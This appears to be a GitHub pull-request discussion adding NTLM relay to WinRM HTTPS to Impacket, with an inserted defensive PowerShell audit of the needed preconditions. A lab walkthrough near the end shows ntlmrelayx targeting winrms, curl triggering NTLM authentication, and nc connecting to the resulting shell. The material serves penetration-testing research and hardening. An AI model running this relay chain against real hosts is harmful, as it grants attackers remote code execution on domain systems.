Add new relay capabilities to the WinRM HTTPS endpoint
This PR adds a new relay capability allowing us to relay SMB/LDAP/HTTP NTLM (v1 or unsecured ones) authentications to the WinRM HTTPS endpoint.
This endpoint is not configured on a default server installation but it is not protected by Channel Binding once configured by a sysadmin which makes it a possible great relay alternative for remote code execution.
Default action creates an interactive TCP shell that can be used via NC (socks is also implemented):
This PR was created by Joseph Mondloch (jmk@foofus) and me :)
That's some crazy stuff, good job @Dfte!
Updates needed. I realized far too late that this technique was working on my environments because NTLMv1 was enabled. This technique won't work for NTLMv2 as is. Yet, I believe this can still be an interesting use case to add to Impacket as this module can still be used if:
- NTLMv1 is activated (natively or via downgrade attacks) ;
- MITM allows redirecting legitimate WinRM connections to our listener ;
- WinRM listener is configured to not support CBT (CBT=None).
Once again, sorry for the misinformation and feel free to add/deny this feature :)
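The three preconditions listed above are all host-side settings a sysadmin can check. The following PowerShell audit is an added example written for this thread; it is not part of the PR or of Impacket. It assumes an elevated session on the Windows host being checked with the WinRM service running, and it treats an absent `LmCompatibilityLevel` registry value as the modern default of 3 (send NTLMv2 only), which is an assumption stated in the code.

```powershell
# Added example, not part of the PR or of Impacket: audits a Windows host for
# the three preconditions listed in the thread (NTLMv1 allowed, WinRM HTTPS
# listener present, CBT hardening set to None). Run from an elevated
# PowerShell session on the host being checked.

function Get-WinRMRelayExposure {
    [CmdletBinding()]
    param()

    # 1. Enumerate WinRM listeners and keep any that use the HTTPS transport.
    #    Get-WSManInstance needs the WinRM service to be running.
    $listeners = Get-WSManInstance -ResourceURI 'winrm/config/Listener' -Enumerate -ErrorAction Stop
    $httpsListeners = @($listeners | Where-Object { $_.Transport -eq 'HTTPS' })

    # 2. Channel Binding Token enforcement for the WinRM service: None, Relaxed or Strict.
    $cbt = (Get-Item -Path 'WSMan:\localhost\Service\Auth\CbtHardeningLevel').Value

    # 3. LmCompatibilityLevel from the Lsa key. When the value is absent, 3
    #    ("send NTLMv2 only") is assumed here as the documented modern default.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                            -Name 'LmCompatibilityLevel' -ErrorAction SilentlyContinue
    $lmLevel = if ($null -ne $lsa -and $null -ne $lsa.LmCompatibilityLevel) {
        [int]$lsa.LmCompatibilityLevel
    } else {
        3
    }

    $findings = @()
    if ($httpsListeners.Count -gt 0 -and $cbt -eq 'None') {
        $findings += 'WinRM HTTPS listener present with CbtHardeningLevel=None: relayed NTLM is not bound to the TLS channel'
    }
    if ($lmLevel -lt 3) {
        $findings += "LmCompatibilityLevel=$lmLevel: this host may still send NTLMv1 responses"
    }
    if ($lmLevel -lt 5) {
        $findings += "LmCompatibilityLevel=$lmLevel: NTLMv1/LM responses are still accepted when this host validates logons"
    }

    # Return an object so the result can be collected or compared across hosts.
    [pscustomobject]@{
        HttpsListenerCount   = $httpsListeners.Count
        CbtHardeningLevel    = $cbt
        LmCompatibilityLevel = $lmLevel
        Findings             = $findings
    }
}

Get-WinRMRelayExposure | Format-List
```

An empty `Findings` list means none of the listed preconditions hold on that host. The CBT finding is closed with `winrm set winrm/config/service/auth '@{CbtHardeningLevel="Strict"}'` (or `Set-Item WSMan:\localhost\Service\Auth\CbtHardeningLevel -Value Strict`), and the NTLMv1 findings by raising `LmCompatibilityLevel` to 5 through Group Policy once nothing in the domain still depends on NTLMv1.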
Have seen the error which made me realize I forgot to include latest WinRMrelayserver upgrades. And I fixed the spelling issues as well so hopefully I'll push all the updates in a couple of days :)
At this point I have added:
- The WinRMRelayServer and WinRMSRelayServer which allows catching NTLM authentication over these two protocols ;
- The WinRMAttack which allows relaying to:
  - Anything if NTLMv1 is used ;
  - WinRMS endpoints if configured with CBT=None

:P
For anybody who wants to play around with this PR:
Setup WinRMS.

```powershell
New-SelfSignedCertificate -Subject 'CN=dc01.corp.local' -TextExtension '2.5.29.37={text}1.3.6.1.5.5.7.3.1'
winrm create 'winrm/config/Listener?Address=*+Transport=HTTPS' '@{Hostname="dc01.corp.local"; CertificateThumbprint="9592A6D026E71AFFA17049D16D74AA7C47A89788"}'
New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction 'Inbound' -LocalPort 5986 -Protocol 'TCP' -Action 'Allow' -Program 'System'
```

Start relay server.

```bash
ntlmrelayx.py -debug --no-smb-server --no-wcf-server --no-raw-server -t winrms://dc01.corp.local
```

Trigger authentication.

```bash
curl http://localhost -u 'corp\administrator:passw0rd' --ntlm
```

Get shell.

```bash
nc -v 127.0.0.1 11000
```
Hey @anadrianmanrique any news on this one? Considering it doesn't change any files or structures but simply adds new ones, can we merge that?
@Dfte sorry for not answering, I've been OOO last week. I think this is a great feature besides limitations with NTLMv2. We are planning to integrate it in the context of 0.13 version, which is soon to be released. Glad to see that you reopened it #1987